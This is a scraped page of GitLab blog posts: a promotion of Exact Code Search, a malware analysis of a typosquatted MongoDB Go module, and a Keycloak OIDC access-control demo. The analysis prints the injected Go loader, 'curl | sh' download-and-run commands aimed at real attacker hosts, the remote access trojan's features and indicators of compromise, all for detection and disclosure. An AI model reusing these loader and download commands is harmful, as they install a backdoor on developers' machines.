Instantly find the precise location where the error is thrown, with surrounding context\n\n**Impact:** Reduce debugging time from minutes to seconds, eliminating the frustration of false positives.\n\n### Code exploration: Master unfamiliar codebases quickly\n\nBefore Exact Code Search:\nBrowse through directories, make educated guesses about file locations, open dozens of files, and slowly build a mental map of the codebase.\n\nWith Exact Code Search:\n\n* Search for key methods or classes with Exact Match mode\n* Review multiple line matches to understand implementation details\n* Use Regular Expression mode to find similar patterns across the codebase\n\n**Impact:** Build a mental map of code structure in minutes rather than hours, dramatically accelerating onboarding and cross-team collaboration.\n\n### Refactoring with confidence\n\nBefore Exact Code Search:\nAttempt to find all instances of a method, miss some occurrences, and introduce bugs through incomplete refactoring.\n\nWith Exact Code Search:\n\n* Use Exact Match mode to find all occurrences of methods or variables\n* Review context to understand usage patterns\n* Plan your refactoring with complete information about impact\n\n**Impact:** Eliminate the \"missed instance\" bugs that often plague refactoring efforts, improving code quality and reducing rework.\n\n### Security auditing: Finding vulnerable patterns\n\nSecurity teams can:\n\n* Create regex patterns matching known vulnerable code\n* Search across all repositories in a namespace\n* Quickly identify potential security issues with context that helps assess risk\n\n**Impact:** Transform security audits from manual, error-prone processes to systematic, comprehensive reviews.\n\n### Cross-repository insights\n\nSearch across your entire namespace or instance to:\n\n* Identify similar implementations across different projects\n* Discover opportunities for shared libraries or standardization\n\n**Impact:** Break down silos between projects and 
identify opportunities for code reuse and standardization.\n\n## The technical foundation: How Zoekt delivers speed and precision\n\nBefore diving into our scale achievements, let's explore what makes Zoekt fundamentally different from traditional search engines — and why it can find exact matches so incredibly fast.\n\n### Positional trigrams: The secret to lightning-fast exact matches\n\nZoekt's speed comes from its use of **positional trigrams** — a technique that indexes every sequence of three characters along with their exact positions in files. This approach solves one of the biggest pain points developers have had with Elasticsearch-based code search: false positives.\n\nHere's how it works:\n\n**Traditional full-text search engines** like Elasticsearch tokenize code into words and lose positional information. When you search for `getUserId()`, they might return results containing **user**, **get**, and **Id** scattered throughout a file — leading to those frustrating false positives for GitLab users.\n\n**Zoekt's positional trigrams** maintain exact character sequences and their positions. When you search for `getUserId()`, Zoekt looks for the exact trigrams like **get**, **etU**, **tUs**, **Use**, **ser**, **erI**, **rId**, **Id(\", \"d()**, all in the correct sequence and position. This ensures that only exact matches are returned.\n\nThe result? Search queries that previously returned hundreds of irrelevant results now return only the precise matches you're looking for. This was [one of our most requested features](https://gitlab.com/gitlab-org/gitlab/-/issues/325234) for good reason - developers were losing significant time sifting through false positives.\n\n### Regular expression performance at scale\n\nZoekt excels at exact matches and is optimized for regular expression searches. 
The engine uses sophisticated algorithms to convert regex patterns into efficient trigram queries when possible, maintaining speed even for complex patterns across terabytes of code.\n\n## Built for enterprise scale\n\nExact Code Search is powerful and built to handle massive scale with impressive performance. This is not just a new UI feature — it's powered by a completely reimagined backend architecture.\n\n### Handling terabytes of code with ease\n\nOn GitLab.com alone, our Exact Code Search infrastructure indexes and searches over **48 TB** of code data while maintaining lightning-fast response times. This scale represents millions of repositories across thousands of namespaces, all searchable within milliseconds. To put this in perspective: This scale represents more code than the entire Linux kernel, Android, and Chromium projects combined. Yet Exact Code Search can find a specific line across this massive codebase in milliseconds.\n\n### Self-registering node architecture\n\nOur innovative implementation features:\n\n* **Automatic node registration:** Zoekt nodes register themselves with GitLab\n* **Dynamic shard assignment:** The system automatically assigns namespaces to nodes\n* **Health monitoring:** Nodes that don't check in are automatically marked offline\n\nThis self-configuring architecture dramatically simplifies scaling. 
When more capacity is needed, administrators can simply add more nodes without complex reconfiguration.\n\n### Distributed system with intelligent load balancing\n\nBehind the scenes, Exact Code Search operates as a distributed system with these key components:\n\n* **Specialized search nodes:** Purpose-built servers that handle indexing and searching\n* **Smart sharding:** Code is distributed across nodes based on namespaces\n* **Automatic load balancing:** The system intelligently distributes work based on capacity\n* **High availability:** Multiple replicas ensure continuous operation even if nodes fail\n\n*Note: High availability is built into the architecture but not yet fully enabled. See [Issue 514736](https://gitlab.com/gitlab-org/gitlab/-/issues/514736) for updates.*\n\n### Seamless security integration\n\nExact Code Search automatically integrates with GitLab's permission system:\n\n* Search results are filtered based on the user's access rights\n* Only code from projects the user has access to is displayed\n* Security is built into the core architecture, not added as an afterthought\n\n### Optimized performance\n\n* **Efficient indexing:** Large repositories are indexed in tens of seconds\n* **Fast query execution:** Most searches return results with sub-second response times\n* **Streaming results:** The new gRPC-based federated search streams results as they're found\n* **Early termination:** Once enough results are collected, the system pauses searching\n\n## From library to distributed system: Engineering challenges we solved\n\nWhile Zoekt provided the core search technology, it was originally designed as a minimal library for managing `.zoekt` index files - not a distributed database or enterprise-scale service. 
Here are the key engineering challenges we overcame to make it work at GitLab's scale\"\n\n### Challenge 1: Building an orchestration layer\n\n**The problem:** Zoekt was designed to work with local index files, not distributed across multiple nodes serving many concurrent users.\n\n**Our solution:** We built a comprehensive orchestration layer that:\n\n* Creates and manages database models to track nodes, indices, repositories, and tasks\n* Implements a self-registering node architecture (inspired by GitLab Runner)\n* Handles automatic shard assignment and load balancing across nodes\n* Provides bidirectional API communication between GitLab Rails and Zoekt nodes\n\n### Challenge 2: Scaling storage and indexing\n\n**The problem:** How do you efficiently manage terabytes of index data across multiple nodes while ensuring fast updates?\n\n**Our solution:** We implemented:\n\n* Intelligent sharding: Namespaces are distributed across nodes based on capacity and load\n* Independent replication: Each node independently indexes from [Gitaly](https://gitlab.com/gitlab-org/gitaly) (our Git storage service), eliminating complex synchronization\n* Watermark management: Sophisticated storage allocation that prevents nodes from running out of space\n* Unified binary architecture: A single `gitlab-zoekt` binary that can operate in both indexer and webserver modes\n\n### Challenge 3: Permission Integration\n\n**The problem:** Zoekt had no concept of GitLab's complex permission system - users should only see results from projects they can access.\n\n**Our solution:** We built native permission filtering directly into the search flow:\n\n* Search requests include user permission context\n* Results are filtered to include only those the user can access in case permissions change before indexing completes\n\n### Challenge 4: Operational simplicity\n\n**The problem:** Managing a distributed search system shouldn't require a dedicated team.\n\n**Our solution:**\n\n* Auto-scaling: 
Adding capacity is as simple as deploying more nodes - they automatically register and start handling work\n* Self-healing: Nodes that don't check in are automatically marked offline and their work redistributed\n* Zero-configuration sharding: The system automatically determines optimal shard assignments\n\n## Gradual rollout: Minimizing risk at scale\n\nRolling out a completely new search backend to millions of users required careful planning. Here's how we minimized customer impact while ensuring reliability:\n\n### Phase 1: Controlled testing (gitlab-org group)\n\nWe started by enabling Exact Code Search only for the `gitlab-org` group - our own internal repositories. This allowed us to:\n\n* Test the system with real production workloads\n* Identify and fix performance bottlenecks\n* Streamline the deployment process\n* Learn from real users' workflows and feedback\n\n### Phase 2: Performance validation and optimization\n\nBefore expanding, we focused on ensuring the system could handle GitLab.com's scale:\n\n* Implemented comprehensive monitoring and alerting\n* Validated storage management with real production data growth\n\n### Phase 3: Incremental customer expansion\n\nWe gradually expanded to customers interested in testing Exact Code Search:\n\n* Gathered feedback on performance and user experience\n* Refined the search UI based on real user workflows\n* Optimized indexing performance (large repositories like `gitlab-org/gitlab` now index in ~10 seconds)\n* Refined the architecture based on operational learnings\n* Massively increased indexing throughput and improved state transition livecycle\n\n### Phase 4: Broad rollout\n\nToday, over 99% of Premium and Ultimate licensed groups on GitLab.com have access to Exact Code Search. 
Users can:\n\n* Toggle between regex and exact search modes\n* Experience the benefits without any configuration changes\n* Fall back to the previous search if needed (though few choose to)\n\nRolling this out gradually meant users didn't experience service disruptions, performance degradation, or feature gaps during the transition. We've already received positive feedback from users as they notice their results becoming more relevant and faster.\n\n> **For technical deep dive:** Interested in the detailed architecture and implementation? Check out our comprehensive [design document](https://handbook.gitlab.com/handbook/engineering/architecture/design-documents/code_search_with_zoekt/) for in-depth technical details about how we built this distributed search system.\n\n## Getting started with Exact Code Search\n\nGetting started with Exact Code Search is simple because it's already enabled by default for Premium and Ultimate groups on GitLab.com (over 99% of eligible groups currently have access).\n\n### Quickstart guide\n\n1. Navigate to the Advanced Search in your GitLab project or group\n2. Enter your search term in the code tab\n3. Toggle between Exact Match and Regular Expression modes\n4. Use filters to refine your search\n\n### Basic search syntax\n\nWhether using Exact Match or Regular Expression mode, you can refine your search with modifiers:\n\n| Query Example | What It Does                                             |\n| ------------- | -------------------------------------------------------- |\n| `file:js`     | Searches only in files containing \"js\" in their name     |\n| `foo -bar`    | Finds \"foo\" but excludes results with \"bar\"              |\n| `lang:ruby`   | Searches only in Ruby files                              |\n| `sym:process` | Finds \"process\" in symbols (methods, classes, variables) |\n\n> **Pro Tip:** For the most efficient searches, start specific and then broaden if needed. 
Using `file:` and `lang:` filters dramatically increases relevance.\n\n### Advanced search techniques\n\nStack multiple filters for precision:\n\n```\nis_expected file:rb -file:spec\n```\n\nThis finds \"is_expected\" in Ruby files that don't have \"spec\" in their name.\n\nUse regular expressions for powerful patterns:\n\n```\ntoken.*=.*[\\\"']\n```\n\n[Watch this search performed against the GitLab Zoekt repository.](https://gitlab.com/search?search=token.*%3D.*%5B%5C%22'%5D&nav_source=navbar&project_id=46649240&group_id=9970&search_code=true&repository_ref=main&regex=true)\n\nThe search helps find hardcoded passwords, which, if not found, can be a security issue.\n\nFor more detailed syntax information, check the [Exact Code Search documentation](https://docs.gitlab.com/user/search/exact_code_search/#syntax).\n\n## Availability and deployment\n\n### Current availability\n\nExact Code Search is currently in Beta for GitLab.com users with Premium and Ultimate licenses:\n\n* Available for over 99% of licensed groups\n* Search in the UI automatically uses Zoekt when available, Exact Code Search in Search API is behind a feature flag\n\n### Self-managed deployment options\n\nFor self-managed instances, we offer several deployment methods:\n\n* Kubernetes/Helm: Our most well-supported method, using our [`gitlab-zoekt` Helm chart](https://gitlab.com/gitlab-org/cloud-native/charts/gitlab-zoekt)\n* Other deployment options: We're working on streamlining deployment for Omnibus and other installation methods\n\nSystem requirements depend on your codebase size, but the architecture is designed to scale horizontally and/or vertically as your needs grow.\n\n## What's coming next\n\nWhile Exact Code Search is already powerful, we're continuously improving it:\n\n* **Scale optimizations** to support instances with hundreds of thousands of repositories\n* **Improved self-managed deployment** options, including streamlined Omnibus support\n* **Full high availability support** with 
automatic failover and load balancing\n\nStay tuned for updates as we move from Beta to General Availability.\n\n## Transform how you work with code\n\nGitLab's Exact Code Search represents a fundamental rethinking of code discovery. By delivering exact matches, powerful regex support, and contextual results, it solves the most frustrating aspects of code search:\n\n* No more wasting time with irrelevant results\n* No more missing important matches\n* No more clicking through files just to understand basic context\n* No more performance issues as codebases grow\n\nThe impact extends beyond individual productivity:\n\n* **Teams collaborate better** with easy code referencing\n* **Knowledge sharing accelerates** when patterns are discoverable\n* **Onboarding becomes faster** with quick codebase comprehension\n* **Security improves** with effective pattern auditing\n* **Technical debt reduction** becomes more feasible\n\nExact Code Search isn't just a feature, it's a better way to understand and work with code. Stop searching and start finding.\n\n**We'd love to hear from you!** Share your experiences, questions, or feedback about Exact Code Search in our [feedback issue](https://gitlab.com/gitlab-org/gitlab/-/issues/420920). Your input helps us prioritize improvements and new features.\n\n> #### Ready to experience smarter code search? Learn more in our [documentation](https://docs.gitlab.com/ee/user/search/exact_code_search.html) or try it now by performing a search in your Premium or Ultimate licensed namespaces or projects. Not a GitLab user yet? 
Try [a free, 60-day trial of GitLab Ultimate with Duo](https://about.gitlab.com/free-trial/)!",[757,786,900],{"featured":6,"template":789,"slug":1122},"exact-code-search-find-code-faster-across-repositories",{"category":125,"slug":767,"posts":1124},[1125,1137,1151],{"content":1126,"config":1135},{"title":1127,"description":1128,"authors":1129,"heroImage":1131,"body":1132,"category":767,"tags":1133,"date":1134},"GitLab catches MongoDB Go module supply chain attack","Learn how GitLab detected a supply chain attack targeting Go developers through fake MongoDB drivers that deploy persistent backdoor malware.",[1130],"Michael Henriksen","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750098739/Blog/Hero%20Images/Blog/Hero%20Images/AdobeStock_282096522_securitycompliance.jpeg_1750098739024.jpg","Software supply chain attacks via malicious dependencies continue to be one of the most significant security threats to modern software development. The widespread use of open source components has enabled development teams to build applications rapidly, but it has also widened the attack surface area. The growing ecosystem of third-party packages presents numerous opportunities for attackers to exploit dependencies through techniques like typosquatting, dependency confusion, and package impersonation, making it increasingly challenging for developers to distinguish legitimate packages from malicious imposters.\n\nTo address this challenge, GitLab's Vulnerability Research team recently developed an automated detection system designed to proactively identify malicious dependencies in software supply chains. 
The system combines multiple detection techniques that work in concert:\n\n- Automated typosquatting detection, which identifies suspicious naming patterns\n- Semantic code analysis, which flags potentially malicious behaviors like network requests or command executions\n- AI-assisted initial screening for advanced payload and obfuscation detection\n\nThis multi-layered approach is used by the vulnerability research team to continuously scan newly published dependencies across major ecosystems, providing early warning of supply chain attacks.\n\nUsing this detection system, GitLab recently identified a live typosquatting attack in the wild that leveraged a malicious MongoDB Go module. Below are details on the attack and how GitLab works to keep supply chains safe.\n\n## Executive summary: A MongoDB module that's not quite right\n\nOur detection system flagged a newly published Go module called `github.com/qiniiu/qmgo`, closely mimicking the popular [MongoDB](https://www.mongodb.com/) module `github.com/qiniu/qmgo`. The legitimate module describes itself as \"The Go driver for MongoDB\" and has gained traction in the Go community.\n\nTo disguise the malicious module as legitimate, the threat actor used a GitHub username nearly identical to the one associated with the real module with one subtle change: they added one “i” (`qiniu` → `qiniiu`). To the casual observer scrolling through search results or auto-complete suggestions, this difference would be very easy to overlook.\n\nThe new module’s code was a working copy of the legitimate `qmgo` module. However, malicious code was inserted into the `NewClient` function in `client.go`, a function that developers would naturally call when initializing their MongoDB connection. 
Concealing malicious code within a function made the payload less likely to be executed during potential runtime security analysis, while ensuring that it would execute from normal usage in real applications.\n\nAfter reporting the malicious module, it was removed within approximately 19 hours of our initial report. However, the threat actor quickly adapted, publishing a second typosquatted version (`github.com/qiiniu/qmgo`) just four days later with identical malicious code. This follow-up attack was also detected and taken down roughly one hour after initial discovery. The rapid redeployment demonstrates the persistent nature of these attacks and highlights why proactive detection is crucial in minimizing exposure windows.\n\n## Technical deep dive: Peeling back the layers\n\nThe threat actor took steps to hide the attack. The malicious payload used a multilayered approach, starting with a compact code snippet that triggered a chain of remote payload downloads:\n\n```go  \ntxt, err := script.Get(\"https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html\").String()  \nif err == nil {  \n    txt2, err := script.Get(string(strings.Replace(txt, \"\\n\", \"\", -1))).String()  \n    if err == nil {  \n        exec.Command(\"/bin/sh\", \"-c\", string(txt2)).Start()  \n    }  \n}  \n```\n\nThe attack unfolds in four distinct layers:\n\n**Layer 1:** The code fetches `update.html` from another repository owned by the typosquat account `qiiniu/vue-element-admin`. The file contained a single line: \n\n```  \nhttps://img.googlex.cloud/seed.php\n```\n\n**Layer 2:** The code then fetches `https://img.googlex.cloud/seed.php`, which returns a single shell command, which is executed: \n\n```bash  \ncurl -s http://207.148.110.29:80/logon61.gif|sh\n```\n\n**Layer 3:** The command tells the system to fetch `http://207.148.110.29:80/logon61.gif` using curl and execute the response as a shell script.  
The shell script downloads what appears to be an MP3 file (`chainelli.mp3`) to `/tmp/vod`, makes it executable, runs it, and immediately deletes it:\n\n```bash  \n#!/bin/sh  \nrm -rf /tmp/vod  \ncurl -s http://207.148.110.29:80/chainelli.mp3 -o /tmp/vod  \nchmod 777 /tmp/vod  \n/tmp/vod  \nrm -rf /tmp/vod  \n```\n\n**Layer 4:** The `chainelli.mp3` file is actually a statically-linked, stripped ELF Go binary designed to establish persistent remote access. Once executed, the malware attempts to connect to its command and control server at `ellipal.spoolsv.cyou` on Port 443 (both TCP and UDP), using a custom encrypted communication protocol with a hardcoded RSA key. From there, it provides the threat actor with remote administration capabilities:\n\n* Complete remote shell access and one-off command execution  \n* Screenshot captures  \n* SOCKS proxy functionality to make connections through the compromised machine  \n* Configurable sleep interval between check-ins with the command and control server to avoid detection  \n* Standard remote access trojan features like filesystem browsing and upload/download\n\n## They're back (already)\n\nJust four days after GitLab reported the initial malicious module and saw it removed, `github.com/qiiniu/qmgo` appeared – the second typosquatted version with identical malicious code. This quick redeployment demonstrates the persistent nature of these attacks and highlights how threat actors adapt quickly to takedown efforts.\n\n## GitLab’s approach: Finding needles in haystacks\n\nThe initial discovery and persistence of this attack validated our approach to proactive dependency monitoring and threat detection. 
GitLab’s detection system combines multiple techniques to identify malicious dependencies:\n\n**Typosquatting detection:** GitLab monitors newly published dependencies and looks for packages that exhibit signs of various typosquatting strategies.\n\n**Semantic heuristics:** Our system statically analyzes code for patterns like network requests, command executions, and other behaviors typical of malicious payloads.\n\n**AI-assisted analysis:** A [large language model](https://about.gitlab.com/blog/what-is-a-large-language-model-llm/) does the initial analysis of the suspicious parts of the code to help us weed out obvious false positives, detect complex payloads, and identify obfuscation techniques used to hide malicious intent.\n\n**Human review:** A human receives an alert to verify the finding and to perform advanced analysis.\n\n## Recommendations: Staying ahead of persistent supply chain threats\n\nThis attack highlights the ongoing challenges in securing software supply chains. The multilayered obfuscation and rapid redeployment after takedown demonstrate that threat actors are willing to invest significant effort in targeting popular dependencies.\n\nThe quick pivot to new typosquatted packages after our initial report highlights a fundamental weakness in the current ecosystems: package managers typically only remove malicious dependencies after they've been published, discovered, and reported by the community. This reactive approach leaves a dangerous window where developers can unknowingly consume compromised packages. 
Proactive monitoring and detection systems like the one GitLab has developed can help close this gap by identifying threats during the publication process itself.\n\nWe've provided indicators of compromise (IOCs) in the next section, which you can use in your monitoring systems to detect this specific campaign.\n\n## Indicators of compromise\n\n| IOC | Description |\n| :---- | :---- |\n| `github.com/qiniiu/qmgo` | Malicious Go module |\n| `github.com/qiiniu/qmgo` | Malicious Go module |\n| `https://raw.githubusercontent.com/qiniiu/vue-element-admin/refs/heads/main/public/update.html` | Payload delivery URL |\n| `https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html` | Payload delivery URL |\n| `https://img.googlex.cloud/seed.php` | Payload delivery URL |\n| `http://207.148.110.29:80/logon61.gif` | Payload delivery URL |\n| `http://207.148.110.29:80/chainelli.mp3` | Payload delivery URL |\n| `img.googlex.cloud` | Payload delivery host |\n| `207.148.110.29` | Payload delivery host |\n| `ellipal.spoolsv.cyou` | Command & Control host |\n| `6ada952c592f286692c59028c5e0fc3fa589759f` | SHA-1 checksum of chainelli.mp3 remote administration malware |\n| `8ae533e2d1d89c871908cbcf5c7d89c433d09b2e7f7d4ade3aef46c55b66509c` | SHA-256 checksum of chainelli.mp3 remote administration malware |\n| `/tmp/vod` | Temporary download location of chainelli.mp3 remote administration malware |\n\n## How GitLab helps secure the software supply chain \n\nMalicious dependencies, like the MongoDB Go module attack, highlight why securing the software supply chain requires more than just CVE monitoring. GitLab’s DevSecOps platform includes [Application Security Testing](https://docs.gitlab.com/user/application_security/secure_your_application/) scanners like Software Composition Analysis in the development lifecycle, helping teams catch vulnerable or malicious packages before they reach production. 
\n\nPaired with research efforts like this, GitLab aims to enable developers to build applications that are secure from the start without compromising on development velocity. \n\n## Timeline\n\n* **2025-06-01T09:31:** GitLab reports `github.com/qiniiu/qmgo` to Go Security  \n* **2025-06-01T09:43:** GitLab reports `github.com/qiniiu/qmgo` to GitHub  \n* **2025-06-01T10:14:** GitLab reports `ellipal.spoolsv.cyou` (`188.166.213.194`) to the IP block owner \n* **2025-06-02T04:03:** Go Security takes down `github.com/qiniiu/qmgo`\n* **2025-06-02T09:57:** The IP block owner suspends `188.166.213.194`\n* **2025-06-03T09:15:** GitHub suspends `github.com/qiniiu`\n* **2025-06-05T17:15:** GitLab reports `github.com/qiiniu/qmgo` to Go Security  \n* **2025-06-05T17:33:** GitLab reports `github.com/qiiniu/qmgo` to GitHub  \n* **2025-06-05T17:45:** Go Security takes down `github.com/qiiniu/qmgo`\n* **2025-06-06T12:25:** GitHub suspends `github.com/qiiniu`",[767,757],"2025-06-30",{"featured":91,"template":789,"slug":1136},"gitlab-catches-mongodb-go-module-supply-chain-attack",{"content":1138,"config":1149},{"title":1139,"description":1140,"heroImage":1141,"date":1142,"body":1143,"category":767,"tags":1144,"authors":1145},"Automating role-based access control (RBAC) at scale","This guide details setting up GitLab + Keycloak + OIDC for RBAC, covering planning, Docker configuration, and automated access governance for DevSecOps.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659561/Blog/Hero%20Images/securitycheck.png","2025-06-20","Security starts with structure. 
Building a scalable and secure development platform begins with getting the fundamentals right — especially role-based access control (RBAC).\n\nTo help our customers scale effectively, we developed the RBAC Accelerator — a modular, outcome-driven enablement program that supports large organizations in defining, enforcing, and scaling access policies across GitLab.\n\nThis foundation enables broader transformation. For example, the Secure SDLC Accelerator, built on top of the RBAC Accelerator, empowers customers to integrate compliance, security, and DevSecOps best practices into their workflows.\n\nGitLab customer [Lely](https://www.lelyna.com/us/), a major Dutch manufacturer of agricultural machines and robots, used this approach to migrate to GitLab Dedicated. Lely automated user provisioning via Azure AD using OpenID Connect (OIDC), enforced [least-privilege policies](https://about.gitlab.com/blog/the-ultimate-guide-to-least-privilege-access-with-gitlab/), and created a scalable, reusable access model to support their future development initiatives.\n\nIn this guide, we’ll take you through a hands-on implementation example of GitLab + [Keycloak](https://www.keycloak.org/) + OIDC, covering everything from running the setup in a Docker environment to automating role mapping, designing a scalable group hierarchy, and aligning GitLab access controls with organizational structure and compliance goals.\n\nThis is a local demo setup intended for proof-of-concept purposes only.\n\nWhether you’re just starting out or optimizing at scale, this modular foundation ensures you’re not just securing access — you’re enabling everything that comes next.\n\n## Getting started with access control planning\n\nBefore implementing any tooling, it’s essential to understand your access landscape. 
\n\nConsider:\n- What GitLab resources need protection (projects, groups, environments)?\n- Who are your personas (Developers, Maintainers, Guests, etc.)?\n- What organizational units (departments, cost centers) should govern access?\n- How does your IdP structure (Keycloak) define users and roles?\n\nUse this stage to draft your:\n- Access control matrix\n- GitLab group hierarchy (team- or product-based)\n- Least privilege policy assumptions\n\nSample group hierarchy \n\n```mermaid\ngraph TD\n    Root[\"Root (Root Group)\"]\n    FirmwareTeam[\"Firmware-Team\"]\n    FirmwareDevelopers[\"Developers (GitLab Developer Role)\"]\n    FirmwareMaintainers[\"Maintainers (GitLab Maintainer Role)\"]\n    FirmwareReporters[\"Reporters (GitLab Reporter Role)\"]\n    HardwareTeam[\"Hardware-Team\"]\n    HardwareDevelopers[\"Developers\"]\n    SoftwareTeam[\"Software-Team\"]\n    SoftwareDevelopers[\"Developers\"]\n    SoftwareMaintainers[\"Maintainers\"]\n    SoftwareReporters[\"Reporters\"]\n    \n    Root --> FirmwareTeam\n    Root --> HardwareTeam\n    Root --> SoftwareTeam\n    \n    FirmwareTeam --> FirmwareDevelopers\n    FirmwareTeam --> FirmwareMaintainers\n    FirmwareTeam --> FirmwareReporters\n    \n    HardwareTeam --> HardwareDevelopers\n    \n    SoftwareTeam --> SoftwareDevelopers\n    SoftwareTeam --> SoftwareMaintainers\n    SoftwareTeam --> SoftwareReporters\n```\n\n## Demo system setup: GitLab + Keycloak in a local Docker environment\n### Prerequisites\n\n- Docker, Docker Compose, OpenSSL\n- GitLab Version 17.7.3 and Keycloak Version 23.0.7 container images\n- Self-signed certificates\n\n### .env configuration\n\nThe demo setup is using the following GitLab and Keycloak versions, ports and secrets.\n\n#### GitLab configuration\n\n```bash\nGITLAB_VERSION=17.7.3-ee.0\nGITLAB_EXTERNAL_URL=http://localhost:8081\nGITLAB_SSH_PORT=8222\n```\n\n####  Keycloak 
configuration\n\n```bash\nKEYCLOAK_VERSION=latest\nKEYCLOAK_ADMIN=\u003Cyour-admin-username>\nKEYCLOAK_ADMIN_PASSWORD=\u003Cyour-admin-password>\nKEYCLOAK_HTTPS_PORT=8443\nKEYCLOAK_CLIENT_SECRET=\u003Cyour-client-secret>  # Get this from Keycloak after setup\n```\n\n## Generate SSL certificates\n\nTo establish trust between GitLab and Keycloak, especially in a self-hosted Docker environment, we’ll need to generate self-signed SSL certificates. These certificates will enable encrypted HTTPS communication and ensure GitLab can securely talk to Keycloak during the OIDC authentication process.\n\nFor production environments, we recommend using certificates from a trusted Certificate Authority (CA), but for local testing and development, self-signed certificates are sufficient.\n\nFollow these step-by-step instructions:\n\n1. Create a folder for the certificates.\n\n\n``` mkdir -p certs```\n\n2. Generate a self-signed certificate with OpenSSL.\n\n```bash\nopenssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\n  -keyout certs/tls.key \\\n  -out certs/tls.crt \\\n  -subj \"/CN=keycloak\" \\\n  -addext \"subjectAltName=DNS:keycloak,DNS:localhost\"\n```\n\n3. 
Create a PKCS12 keystore for Keycloak.\n\n\n```bash\nopenssl pkcs12 -export \\\n  -in certs/tls.crt \\\n  -inkey certs/tls.key \\\n  -out certs/keystore.p12 \\\n  -name keycloak \\\n  -password pass:password\n```\n\n## Start the service using Docker compose\n\nNow that we have our certificates, we can stand up our local GitLab + Keycloak environment using Docker Compose:\n\n\n```yaml\nversion: '3.8'\nservices:\n  gitlab:\n    image: gitlab/gitlab-ee:${GITLAB_VERSION}\n    container_name: gitlab\n    restart: unless-stopped\n    environment:\n      GITLAB_OMNIBUS_CONFIG: |\n        external_url '${GITLAB_EXTERNAL_URL:-http://localhost:8081}'\n        gitlab_rails['gitlab_shell_ssh_port'] = ${GITLAB_SSH_PORT:-8222}\n        gitlab_rails['display_initial_root_password'] = true\n\n        # OAuth Configuration\n        gitlab_rails['omniauth_enabled'] = true\n        gitlab_rails['omniauth_allow_single_sign_on'] = ['openid_connect']\n        gitlab_rails['omniauth_block_auto_created_users'] = false\n        gitlab_rails['omniauth_providers'] = [\n            {\n                'name' => 'openid_connect',\n                'label' => 'Keycloak',\n                'args' => {\n                    'name' => 'openid_connect',\n                    'scope' => ['openid', 'profile', 'email'],\n                    'response_type' => 'code',\n                    'issuer' => 'https://localhost:8443/realms/GitLab',\n                    'client_auth_method' => 'query',\n                    'discovery' => false,\n                    'uid_field' => 'preferred_username',\n                    'pkce' => true,\n                    'client_options' => {\n                        'identifier' => 'gitlab',\n                        'secret' => '${KEYCLOAK_CLIENT_SECRET}',\n                        'redirect_uri' => '${GITLAB_EXTERNAL_URL:-http://localhost:8081}/users/auth/openid_connect/callback',\n                        'authorization_endpoint' => 
'https://localhost:8443/realms/GitLab/protocol/openid-connect/auth',\n                        'token_endpoint' => 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/token',\n                        'userinfo_endpoint' => 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/userinfo',\n                        'jwks_uri' => 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/certs'\n                    }\n                }\n            }\n        ]\n    volumes:\n      - gl-config:/etc/gitlab\n      - gl-data:/var/opt/gitlab\n      - ./certs/tls.crt:/etc/gitlab/trusted-certs/keycloak.crt\n    ports:\n      - '${GITLAB_EXTERNAL_PORT:-8081}:8081'\n      - '${GITLAB_SSH_PORT:-8222}:22'\n    shm_size: '256m'\n\n  keycloak:\n    image: quay.io/keycloak/keycloak:${KEYCLOAK_VERSION}\n    container_name: keycloak-server\n    restart: unless-stopped\n    command: [\n      \"start-dev\",\n      \"--import-realm\",\n      \"--https-port=${KEYCLOAK_HTTPS_PORT}\",\n      \"--https-key-store-file=/etc/x509/https/keystore.p12\",\n      \"--https-key-store-password=password\"\n    ]\n    volumes:\n      - ./data:/opt/keycloak/data/import\n      - ./certs:/etc/x509/https\n    environment:\n      KEYCLOAK_ADMIN: ${KEYCLOAK_ADMIN}\n      KEYCLOAK_ADMIN_PASSWORD: ${KEYCLOAK_ADMIN_PASSWORD}\n    ports:\n      - \"${KEYCLOAK_HTTPS_PORT}:8443\"\n\nvolumes:\n  gl-config:\n  gl-data:\n```\n\n  \nRun the `docker-compose up -d` command and your GitLab + Keycloak environment will be up in minutes.\n\n\n```\ndocker-compose up -d\n```\n\n## Keycloak realm configuration\n\nYour Keycloak realm is automatically configured on startup as it's defined in the `docker-compose` file.\n\nThe realm configuration will include:\n\n- Pre-configured GitLab client\n- Default client secret\n\nYou can access Keycloak admin console at `https://localhost:8443` with:\n\n- Username: admin\n- Password: from your `.env` file\n- To verify the setup:\n  - Log into Keycloak admin console\n  - 
Select the **GitLab** realm\n  - Check **Clients > gitlab**\n\n\nVerify the client configuration matches your environment.\n\nTo showcase the automated RBAC mechanism, you will need to follow these steps:\n\n- Map realm roles to GitLab roles\n- Create group structure with mapping roles, matching the Group, Sub-group, Project pattern in GitLab.\n\nBefore provisioning your first users to the user groups, it’s recommended to log into your GitLab instance to retrieve your instance root password:\n\n1. Access GitLab at `http://localhost:8081`.\n\n2. Get the root password:\n\n``` \ndocker exec gitlab grep 'Password:' /etc/gitlab/initial_root_password\n\n```\n\n3. Log in as root with the retrieved password.\n\n## Putting it all together\n\nTo demonstrate the power of this integrated RBAC model, start by walking through a real-world user journey — from identity to access. \n\nBegin in Keycloak by showcasing a user assigned to specific realm roles (e.g., developer, maintainer) and groups (e.g., /engineering/platform). These roles have been mapped to GitLab access levels via OIDC claims, while group affiliations align with GitLab’s structured hierarchy of root groups, sub-groups, and projects. \n\nUpon login through GitLab’s SSO Keycloak endpoint, the user is automatically provisioned into the correct group and assigned the appropriate role — with no manual intervention. \n\nWithin GitLab, you can see that the user can interact with the assigned project: For example, a developer might push code and open a merge request, but not merge to protected branches — validating the least-privilege model. \n\nFinally, you can showcase access across multiple teams or products that are managed centrally in Keycloak, yet enforced precisely in GitLab through group sync and permissions inheritance. 
